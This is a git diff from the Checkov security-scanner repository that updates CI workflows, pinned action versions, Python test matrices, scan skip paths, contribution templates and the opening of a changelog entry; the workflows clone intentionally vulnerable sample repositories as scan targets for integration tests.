diff --git a/.flake8 b/.flake8
index a9e6889a854..02cc05f1ba5 100644
--- a/.flake8
+++ b/.flake8
@@ -3,7 +3,7 @@
 [flake8]
 max-line-length = 120
 # E203,E501 don't work with black together
-ignore = E203,E501,E731,W503,W504,DUO107,DUO104,DUO130,DUO109,DUO116,B028,B950,TC001,TC003,TC006,B907,B038
+ignore = E203,E501,E731,W503,W504,DUO107,DUO104,DUO130,DUO109,DUO116,B028,B950,TC001,TC003,TC006,B907,B038,B909
 select = C,E,F,W,B,B9,A,TC
 extend-exclude = .github, .pytest_cache, docs/*, venv/*, tests/*, flake8_plugins/*, cdk_integration_tests/src/python/*
 
diff --git a/.github/ISSUE_TEMPLATE/feature_request.md b/.github/ISSUE_TEMPLATE/feature_request.md
new file mode 100644
index 00000000000..6ac906daf1a
--- /dev/null
+++ b/.github/ISSUE_TEMPLATE/feature_request.md
@@ -0,0 +1,21 @@
+---
+name: Feature request
+about: Feature requests or requests for enhancements that are not bugs.
+title: ''
+labels: 'contribution requested'
+assignees: ''
+
+---
+
+**Describe the feature**
+
+Explain the feature in detail. Note that feature requests are always reviewed, but prioritized based on popularity, effort, and impact. We also welcome contributions.
+
+**Examples**
+
+Please share an example code sample (in the IaC of your choice) + expected inputs and outputs from Checkov + the expected outcomes.
+
+**Additional context**
+
+Add any other context about the problem here.
+
diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md
index 454ae46a0e7..7ae57a793cc 100644
--- a/.github/PULL_REQUEST_TEMPLATE.md
+++ b/.github/PULL_REQUEST_TEMPLATE.md
@@ -2,14 +2,14 @@
 
 [//]: # "
     # PR Title
-    Be aware that we use the title to create changelog automatically and therefore only allow specific prefixes
-    - break:    to indicate a breaking change, this supersedes any of the types
+    We use the title to create changelog automatically and therefore only allow specific prefixes
+    - break:    to indicate a breaking change, this supersedes any of the other types
     - feat:     to indicate new features or checks
     - fix:      to indicate a bugfix or handling of edge cases of existing checks
     - docs:     to indicate an update to our documentation
     - chore:    to indicate adjustments to workflow files or dependency updates
     - platform: to indicate a change needed for the platform
-    Additionally a scope is needs to be added to the prefix, which indicates the targeted framework, in doubt choose 'general'.
+    Each prefix should be accompanied by a scope that specifies the targeted framework. If uncertain, use 'general'.
     #    
     Allowed prefixs:
     ansible|argo|arm|azure|bicep|bitbucket|circleci|cloudformation|dockerfile|github|gha|gitlab|helm|kubernetes|kustomize|openapi|sast|sca|secrets|serverless|terraform|general|graph|terraform_plan|terraform_json
@@ -34,10 +34,8 @@ Fixes # (issue)
 
 ## Checklist:
 
-- [ ] My code follows the style guidelines of this project
 - [ ] I have performed a self-review of my own code
 - [ ] I have commented my code, particularly in hard-to-understand areas
 - [ ] I have made corresponding changes to the documentation
 - [ ] I have added tests that prove my feature, policy, or fix is effective and works
 - [ ] New and existing tests pass locally with my changes
-- [ ] Any dependent changes have been merged and published in downstream modules
diff --git a/.github/checkov.yaml b/.github/checkov.yaml
index 558676fd686..5428125e94e 100644
--- a/.github/checkov.yaml
+++ b/.github/checkov.yaml
@@ -12,7 +12,6 @@ skip-path:
 - tests/common/utils/conftest.py
 - tests/common/utils/test_secrets_utils.py
 - tests/sca_image/conftest.py
-- tests/sca_package/conftest.py
 - tests/sca_package_2/conftest.py
 - tests/secrets
 - tests/terraform/checks/provider
@@ -22,8 +21,18 @@ skip-path:
 - tests/terraform/runner/tf_plan_skip_check_regex/resource/tfplan1.json
 - tests/terraform/runner/tfplan2.json
 - tests/unit/test_secrets.py
+- tests/terraform/runner/resources/example/example.tf
+- tests/terraform/graph
+- tests/terraform/checks
+- /checkov/secrets/plugins/entropy_keyword_combinator.py
+- /checkov/secrets/plugins/detector_utils.py
+- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/pass.py
+- /cdk_integration_tests/src/python/RedshiftClusterEncryption/pass.py
+- /cdk_integration_tests/src/python/RedshiftClusterEncryption/fail__1__.py
+- /cdk_integration_tests/src/python/RedshiftClusterPubliclyAccessible/fail__1__.py
 - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/fail__2__.py
 - /cdk_integration_tests/src/python/ElasticacheReplicationGroupEncryptionAtTransitAuthToken/pass.py
+- /cdk_integration_tests/src/typescript
 - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml
 - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml
 - /checkov/cdk/checks/python/GlueDataCatalogEncryption.yaml
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 48b57ad370b..5219680ac25 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -44,12 +44,12 @@ jobs:
     strategy:
       fail-fast: true
       matrix:
-        python: ["3.8", "3.9", "3.10", "3.11", "3.12"]
+        python: ["3.10", "3.11", "3.12"]
         os: [ubuntu-latest, macos-latest, windows-latest]
     runs-on: ${{ matrix.os }}
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
       - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8  # v3
@@ -92,13 +92,67 @@ jobs:
       - name: Run integration tests
         run: |
           pipenv run pytest integration_tests
+
+  integration-tests-old-python:
+    strategy:
+      fail-fast: true
+      matrix:
+        python: ["3.8", "3.9"]
+        os: [ubuntu-latest, macos-12, windows-latest]
+    runs-on: ${{ matrix.os }}
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
+        with:
+          python-version: ${{ matrix.python }}
+      - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8  # v3
+      - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78  # v3
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+      - uses: imranismail/setup-kustomize@a76db1c6419124d51470b1e388c4b29476f495f1  # v2
+        if: ${{ runner.os != 'windows' }}
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Install pipenv
+        run: |
+          python -m pip install --no-cache-dir --upgrade pipenv
+      - name: Build & install checkov package
+        run: |
+          # remove venv, if exists
+          pipenv --rm || true
+          pipenv --python ${{ matrix.python }}
+          pipenv run pip install pytest pytest-xdist setuptools wheel
+          pipenv run python setup.py sdist bdist_wheel
+          bash -c 'pipenv run pip install dist/checkov-*.whl'
+      - name: Clone Terragoat - vulnerable terraform
+        run: git clone https://github.com/bridgecrewio/terragoat
+      - name: Clone Cfngoat - vulnerable cloudformation
+        run: git clone https://github.com/bridgecrewio/cfngoat
+      - name: Clone Kubernetes-goat - vulnerable kubernetes
+        run: git clone https://github.com/madhuakula/kubernetes-goat
+      - name: Clone kustomize-goat - vulnerable kustomize
+        run: git clone https://github.com/bridgecrewio/kustomizegoat
+      - name: Create checkov reports
+        run: |
+          # Just making sure the API key tests don't run on PRs
+          bash -c './integration_tests/prepare_data.sh "${{ matrix.os }}" "${{ matrix.python }}"'
+        env:
+          LOG_LEVEL: INFO
+          BC_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+          TF_REGISTRY_TOKEN: ${{ secrets.TFC_TOKEN }}
+          GITHUB_PAT: ${{ secrets.GITHUB_TOKEN }}
+      - name: Run integration tests
+        run: |
+          pipenv run pytest integration_tests
+
   prisma-tests:
     runs-on: [ self-hosted, public, linux, x64 ]
     env:
       PYTHON_VERSION: "3.8"
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - name: Install pipenv
@@ -126,13 +180,13 @@ jobs:
     strategy:
       fail-fast: true
       matrix:
-        python: ["3.8", "3.12"]
+        python: ["3.10", "3.11", "3.12"]
         os: [ubuntu-latest, macos-latest]
     runs-on: ${{ matrix.os }}
     continue-on-error: true # for now it is ok to fail
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
       - name: Install pipenv
@@ -161,6 +215,47 @@ jobs:
       - name: Run integration tests
         run: |
           pipenv run pytest sast_integration_tests
+
+  sast-integration-tests-old-python:
+    strategy:
+      fail-fast: true
+      matrix:
+        python: ["3.8", "3.9"]
+        os: [ubuntu-latest, macos-12]
+    runs-on: ${{ matrix.os }}
+    continue-on-error: true # for now it is ok to fail
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
+        with:
+          python-version: ${{ matrix.python }}
+      - name: Install pipenv
+        run: |
+          python -m pip install --no-cache-dir --upgrade pipenv
+      - name: Build & install checkov package
+        run: |
+          # remove venv, if exists
+          pipenv --rm || true
+          pipenv --python ${{ matrix.python }}
+          pipenv run pip install pytest pytest-xdist setuptools wheel
+          pipenv run python setup.py sdist bdist_wheel
+          bash -c 'pipenv run pip install dist/checkov-*.whl'
+      - name: Clone flask - Python repo for SAST
+        run: git clone https://github.com/pallets/flask
+      - name: Clone WebGoat - Java repo for SAST
+        run: git clone https://github.com/WebGoat/WebGoat
+      - name: Clone axios - JavaScript repo for SAST
+        run: git clone https://github.com/axios/axios
+      - name: Create checkov reports
+        env:
+          LOG_LEVEL: INFO
+          BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        run: bash -c './sast_integration_tests/prepare_data.sh'
+      - name: Run integration tests
+        run: |
+          pipenv run pytest sast_integration_tests
+
   unit-tests:
     timeout-minutes: 30
     runs-on: ubuntu-latest
@@ -169,7 +264,7 @@ jobs:
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
       - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+        uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78  # v3
@@ -194,7 +289,7 @@ jobs:
         run: |
           pipenv run python -m pytest tests
   bump-version:
-    needs: [integration-tests, unit-tests, prisma-tests] # add 'sast-integration-tests' when ready
+    needs: [integration-tests, unit-tests, prisma-tests, sast-integration-tests, integration-tests-old-python, sast-integration-tests-old-python]
     runs-on: [self-hosted, public, linux, x64]
     environment: release
     permissions:
@@ -215,7 +310,7 @@ jobs:
           gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }}
           passphrase: ${{ secrets.PASSPHRASE }}
       - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+        uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - name: Install pipenv
diff --git a/.github/workflows/codeql-analysis.yml b/.github/workflows/codeql-analysis.yml
index ba981e5a428..7db98566c7a 100644
--- a/.github/workflows/codeql-analysis.yml
+++ b/.github/workflows/codeql-analysis.yml
@@ -36,7 +36,7 @@ jobs:
       - name: Checkout repository
         uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
       - name: Set up Python
-        uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+        uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: '3.10'
       - name: Setup python for CodeQL
@@ -54,12 +54,12 @@ jobs:
           pipenv lock -r > requirements.txt
           pip install -r requirements.txt
       - name: Initialize CodeQL
-        uses: github/codeql-action/init@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118  # v2
+        uses: github/codeql-action/init@2d790406f505036ef40ecba973cc774a50395aac  # v2
         with:
           languages: python
           setup-python-dependencies: false
           config-file: ./.github/codeql-config.yml
       - name: Autobuild
-        uses: github/codeql-action/autobuild@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118  # v2
+        uses: github/codeql-action/autobuild@2d790406f505036ef40ecba973cc774a50395aac  # v2
       - name: Perform CodeQL Analysis
-        uses: github/codeql-action/analyze@e5f05b81d5b6ff8cfa111c80c22c5fd02a384118  # v2
+        uses: github/codeql-action/analyze@2d790406f505036ef40ecba973cc774a50395aac  # v2
diff --git a/.github/workflows/coverage.yaml b/.github/workflows/coverage.yaml
index 6d89d565555..5850c4ee538 100644
--- a/.github/workflows/coverage.yaml
+++ b/.github/workflows/coverage.yaml
@@ -27,7 +27,7 @@ jobs:
           gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }}
           passphrase: ${{ secrets.PASSPHRASE }}
       - name: Set up Python ${{ env.PYTHON_VERSION }}
-        uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+        uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78  # v3
diff --git a/.github/workflows/jekyll-gh-pages.yml b/.github/workflows/jekyll-gh-pages.yml
index 0b25f320ffc..2633b9148a7 100644
--- a/.github/workflows/jekyll-gh-pages.yml
+++ b/.github/workflows/jekyll-gh-pages.yml
@@ -29,9 +29,9 @@ jobs:
       - name: Checkout
         uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
       - name: Setup Pages
-        uses: actions/configure-pages@1f0c5cde4bc74cd7e1254d0cb4de8d49e9068c7d  # v3
+        uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b  # v3
       - name: Build with Jekyll
-        uses: actions/jekyll-build-pages@e4ef22193c23ea849fc3fea6dbce69da1ee65b6d  # v1
+        uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66  # v1
         with:
           source: ./docs
           destination: ./_site
diff --git a/.github/workflows/nightly.yml b/.github/workflows/nightly.yml
index 96203f1c1a6..aa74e94a2ab 100644
--- a/.github/workflows/nightly.yml
+++ b/.github/workflows/nightly.yml
@@ -94,7 +94,7 @@ jobs:
         with:
           fetch-depth: 0
           token: ${{ secrets.GITHUB_TOKEN }}
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - name: Install pipenv
@@ -128,7 +128,7 @@ jobs:
         with:
           upload_url: ${{ needs.github-release.outputs.upload_url }}
           asset_path: checkov.zip
-          asset_name: checkov_${{ matrix.name }}_X86_64_${{ needs.github-release.outputs.version }}.zip
+          asset_name: checkov_${{ matrix.name }}_X86_64.zip
           asset_content_type: application/zip
   build-release-artifact-linux-arm:
     needs: [ github-release ]
@@ -164,5 +164,5 @@ jobs:
         with:
           upload_url: ${{ needs.github-release.outputs.upload_url }}
           asset_path: checkov.zip
-          asset_name: checkov_linux_arm64_${{ needs.github-release.outputs.version }}.zip
+          asset_name: checkov_linux_arm64.zip
           asset_content_type: application/zip
diff --git a/.github/workflows/pipenv-update.yml b/.github/workflows/pipenv-update.yml
index 98be69ccc12..b0a78f60a27 100644
--- a/.github/workflows/pipenv-update.yml
+++ b/.github/workflows/pipenv-update.yml
@@ -26,7 +26,7 @@ jobs:
         with:
           gpg_private_key: ${{ secrets.GPG_PRIVATE_KEY }}
           passphrase: ${{ secrets.PASSPHRASE }}
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
       - name: Install pipenv
@@ -42,7 +42,7 @@ jobs:
           GITHUB_TOKEN: ${{ secrets.PAT_TOKEN }}
       - name: Create Pull Request
         id: cpr
-        uses: peter-evans/create-pull-request@153407881ec5c347639a548ade7d8ad1d6740e38  # v5
+        uses: peter-evans/create-pull-request@c5a7806660adbe173f04e3e038b0ccdcd758773c  # v5
         with:
           token: ${{ secrets.PAT_TOKEN }}
           title: '[AUTO-PR] Update pipenv packages'
diff --git a/.github/workflows/pr-test.yml b/.github/workflows/pr-test.yml
index 7d8032e1a92..b7f9506f581 100644
--- a/.github/workflows/pr-test.yml
+++ b/.github/workflows/pr-test.yml
@@ -35,15 +35,29 @@ jobs:
       PYTHON_VERSION: "3.8"
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
-      - name: Install cfn-lint
+      - name: Get changed CFN test files
+        id: changed-files-specific
+        uses: tj-actions/changed-files@eaf854ef0c266753e1abec356dcf17d92695b251 # v44
+        with:
+          files: tests/cloudformation/checks/resource/aws/**/*
+      - name: Filter YAML and JSON files
+        if: steps.changed-files-specific.outputs.any_changed == 'true'
+        id: filter-files
         run: |
-          pip install -U cfn-lint
-      - name: Lint Cloudformation templates
+          YAML_JSON_FILES=$(echo ${{ steps.changed-files-specific.outputs.all_changed_files }} | tr ' ' '\n' | grep -E '\.ya?ml$|\.json$' | tr '\n' ' ')
+          if [ -n "$YAML_JSON_FILES" ]; then
+            echo "YAML_JSON_FILES=$YAML_JSON_FILES" >> "$GITHUB_ENV"
+          fi
+      - name: Install cfn-lint & Lint Cloudformation templates
+        if: env.YAML_JSON_FILES != ''
         run: |
-          cfn-lint tests/cloudformation/checks/resource/aws/**/* -i W
+          pip install -U cfn-lint
+          for file in $YAML_JSON_FILES; do
+            cfn-lint "$file" -i W
+          done
 
   mypy:
     uses: bridgecrewio/gha-reusable-workflows/.github/workflows/mypy.yaml@main
@@ -60,7 +74,7 @@ jobs:
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
       - name: Set up Python ${{ matrix.python }}
-        uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+        uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
           allow-prereleases: true
@@ -115,12 +129,67 @@ jobs:
     strategy:
       fail-fast: true
       matrix:
-        python: ["3.8", "3.9", "3.10", "3.11", "3.12"]
+        python: ["3.10", "3.11", "3.12"]
         os: [ubuntu-latest, macos-latest, windows-latest]
     runs-on: ${{ matrix.os }}
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
+        with:
+          python-version: ${{ matrix.python }}
+          allow-prereleases: true
+          cache: "pipenv"
+          cache-dependency-path: "Pipfile.lock"
+      - uses: actions/setup-node@b39b52d1213e96004bfcb1c61a8a6fa8ab84f3e8  # v4
+      - uses: azure/setup-helm@5119fcb9089d432beecbf79bb2c7915207344b78  # v3
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+      - uses: imranismail/setup-kustomize@a76db1c6419124d51470b1e388c4b29476f495f1  # v2
+        if: ${{ runner.os != 'windows' }}
+        with:
+          github-token: ${{ secrets.GITHUB_TOKEN }}
+      - name: Install pipenv
+        run: |
+          python -m pip install --no-cache-dir --upgrade pipenv
+      - name: Build & install checkov package
+        shell: bash
+        run: |
+          # remove venv, if exists
+          pipenv --rm || true
+          pipenv --python ${{ matrix.python }}
+          pipenv run pip install pytest pytest-xdist setuptools wheel
+          pipenv run python setup.py sdist bdist_wheel
+          bash -c 'pipenv run pip install dist/checkov-*.whl'
+      - name: Clone Terragoat - vulnerable terraform
+        run: git clone https://github.com/bridgecrewio/terragoat
+      - name: Clone Cfngoat - vulnerable cloudformation
+        run: git clone https://github.com/bridgecrewio/cfngoat
+      - name: Clone Kubernetes-goat - vulnerable kubernetes
+        run: git clone https://github.com/madhuakula/kubernetes-goat
+      - name: Clone kustomize-goat - vulnerable kustomize
+        run: git clone https://github.com/bridgecrewio/kustomizegoat
+      - name: Create checkov reports
+        env:
+          LOG_LEVEL: INFO
+          BC_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        run: |
+          # Just making sure the API key tests don't run on PRs
+          bash -c './integration_tests/prepare_data.sh ${{ matrix.os }} 3.8'
+      - name: Run integration tests
+        run: |
+          pipenv run pytest integration_tests -k 'not api_key'
+
+  integration-tests-old-python:
+    strategy:
+      fail-fast: true
+      matrix:
+        python: ["3.8", "3.9"]
+        os: [ubuntu-latest, macos-12, windows-latest]
+    runs-on: ${{ matrix.os }}
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
           allow-prereleases: true
@@ -170,12 +239,60 @@ jobs:
     strategy:
       fail-fast: true
       matrix:
-        python: ["3.8", "3.12"]
+        python: ["3.12"]
         os: [ubuntu-latest, macos-latest]
     runs-on: ${{ matrix.os }}
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
+        with:
+          python-version: ${{ matrix.python }}
+          allow-prereleases: true
+          cache: "pipenv"
+          cache-dependency-path: "Pipfile.lock"
+      - name: Install pipenv
+        run: |
+          python -m pip install --no-cache-dir --upgrade pipenv
+      - name: Build & install checkov package
+        run: |
+          # remove venv, if exists
+          pipenv --rm || true
+          pipenv --python ${{ matrix.python }}
+          pipenv run pip install pytest pytest-xdist setuptools wheel
+          pipenv run python setup.py sdist bdist_wheel
+          bash -c 'pipenv run pip install dist/checkov-*.whl'
+      - name: Clone flask - Python repo for SAST
+        run: git clone https://github.com/pallets/flask
+      - name: Clone WebGoat - Java repo for SAST
+        run: git clone https://github.com/WebGoat/WebGoat
+      - name: Clone axios - JavaScript repo for SAST
+        run: git clone https://github.com/axios/axios
+      - name: Create checkov reports
+        env:
+          LOG_LEVEL: INFO
+          BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        if: env.BC_API_KEY != null
+        run: bash -c './sast_integration_tests/prepare_data.sh'
+      - name: Run integration tests
+        env:
+          LOG_LEVEL: INFO
+          BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        if: env.BC_API_KEY != null
+        run: |
+          pipenv run pytest sast_integration_tests
+
+  sast-integration-tests-old-python:
+    strategy:
+      fail-fast: true
+      matrix:
+        python: ["3.8"]
+        os: [ubuntu-latest, macos-12]
+    runs-on: ${{ matrix.os }}
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
           allow-prereleases: true
@@ -218,12 +335,54 @@ jobs:
     strategy:
       fail-fast: true
       matrix:
-        python: ["3.8", "3.12"]
+        python: ["3.12"]
         os: [ubuntu-latest, macos-latest]
     runs-on: ${{ matrix.os }}
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
+        with:
+          python-version: ${{ matrix.python }}
+          allow-prereleases: true
+          cache: "pipenv"
+          cache-dependency-path: "Pipfile.lock"
+      - name: Install pipenv
+        run: |
+          python -m pip install --no-cache-dir --upgrade pipenv
+      - name: Build & install checkov package
+        run: |
+          # remove venv, if exists
+          pipenv --rm || true
+          pipenv --python ${{ matrix.python }}
+          pipenv run pip install pytest pytest-xdist setuptools wheel
+          pipenv run python setup.py sdist bdist_wheel
+          bash -c 'pipenv run pip install dist/checkov-*.whl'
+      - name: Create checkov reports
+        env:
+          LOG_LEVEL: INFO
+          BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        if: env.BC_API_KEY != null
+        run: bash -c './cdk_integration_tests/prepare_data.sh'
+      - name: Run integration tests
+        env:
+          LOG_LEVEL: INFO
+          BC_API_KEY: ${{ secrets.PRISMA_KEY_API2 }}
+          PRISMA_API_URL: ${{ secrets.PRISMA_API_URL_2 }}
+        if: env.BC_API_KEY != null
+        run: |
+          pipenv run pytest cdk_integration_tests
+
+  cdk-integration-tests-old-python:
+    strategy:
+      fail-fast: true
+      matrix:
+        python: ["3.8"]
+        os: [ubuntu-latest, macos-12]
+    runs-on: ${{ matrix.os }}
+    steps:
+      - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ matrix.python }}
           allow-prereleases: true
@@ -263,7 +422,7 @@ jobs:
     runs-on: [self-hosted, public, linux, x64]
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
           cache: "pipenv"
@@ -318,7 +477,7 @@ jobs:
       WORKING_DIRECTORY: ./dogfood_tests
     steps:
       - uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v3
-      - uses: actions/setup-python@0a5c61591373683505ea898e09a3ea4f39ef2b9c  # v4
+      - uses: actions/setup-python@39cd14951b08e74b54015e9e001cdefcf80e669f  # v4
         with:
           python-version: ${{ env.PYTHON_VERSION }}
           cache: "pipenv"
diff --git a/.github/workflows/security-shared.yml b/.github/workflows/security-shared.yml
index ba5474c27e7..74510c01e9b 100644
--- a/.github/workflows/security-shared.yml
+++ b/.github/workflows/security-shared.yml
@@ -18,7 +18,7 @@ jobs:
         with:
           ref: ${{ github.event.pull_request.head.sha }}
       - name: security test
-        uses: jpetrucciani/bandit-check@0a848ad401dadaf2937e4c9cc9a4eeeea2d0b5df  # v1
+        uses: jpetrucciani/bandit-check@74c5ecc4297e374c7e9283bc81f649287bb14f34  # v1
         with:
           path: 'checkov'
   trufflehog-secrets:
diff --git a/.gitpod.Dockerfile b/.gitpod.Dockerfile
index 4fb679f5d3a..5b4c88fc5f3 100644
--- a/.gitpod.Dockerfile
+++ b/.gitpod.Dockerfile
@@ -1,5 +1,5 @@
 FROM gitpod/workspace-python
-RUN pyenv install 3.7.12
+RUN pyenv install 3.10.14
 RUN wget -q -O get_kustomize.sh https://raw.githubusercontent.com/kubernetes-sigs/kustomize/master/hack/install_kustomize.sh; \
  chmod 700 get_kustomize.sh; \
  mkdir -p /usr/local/bin; \
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 0211eceb116..03234efdf77 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,6 +1,863 @@
 # CHANGELOG
 
-## [Unreleased](https://github.com/bridgecrewio/checkov/compare/3.2.12...HEAD)
+## [Unreleased](https://github.com/bridgecrewio/checkov/compare/3.2.213...HEAD)
+
+## [3.2.213](https://github.com/bridgecrewio/checkov/compare/3.2.209...3.2.213) - 2024-07-29
+
+### Feature
+
+- **arm:** ARM AppServiceInstanceMinimum - CKV_AZURE_212 - [#6502](https://github.com/bridgecrewio/checkov/pull/6502)
+- **terraform:** - TF and CFN - Add a policy for ensuring AWS Bedrock Agent is encrypted with a CMK - [#6603](https://github.com/bridgecrewio/checkov/pull/6603)
+
+### Bug Fix
+
+- **ansible:** Fix CKV2_ANSIBLE_2 - [#6610](https://github.com/bridgecrewio/checkov/pull/6610)
+- **arm:** Support upper and lower disabled for CKV_AZURE_189 - [#6609](https://github.com/bridgecrewio/checkov/pull/6609)
+- **dockerfile:** Fix edge case with apt in domain - [#6611](https://github.com/bridgecrewio/checkov/pull/6611)
+- **terraform_plan:** Fix parsing other types of provisioners - [#6606](https://github.com/bridgecrewio/checkov/pull/6606)
+- **terraform:** add condition for CKV_AWS_353 - [#6607](https://github.com/bridgecrewio/checkov/pull/6607)
+- **terraform:** catch unknowns with WAF configs - [#6612](https://github.com/bridgecrewio/checkov/pull/6612)
+- **terraform:** Handle default for CKV_GCP_76 - [#6608](https://github.com/bridgecrewio/checkov/pull/6608)
+
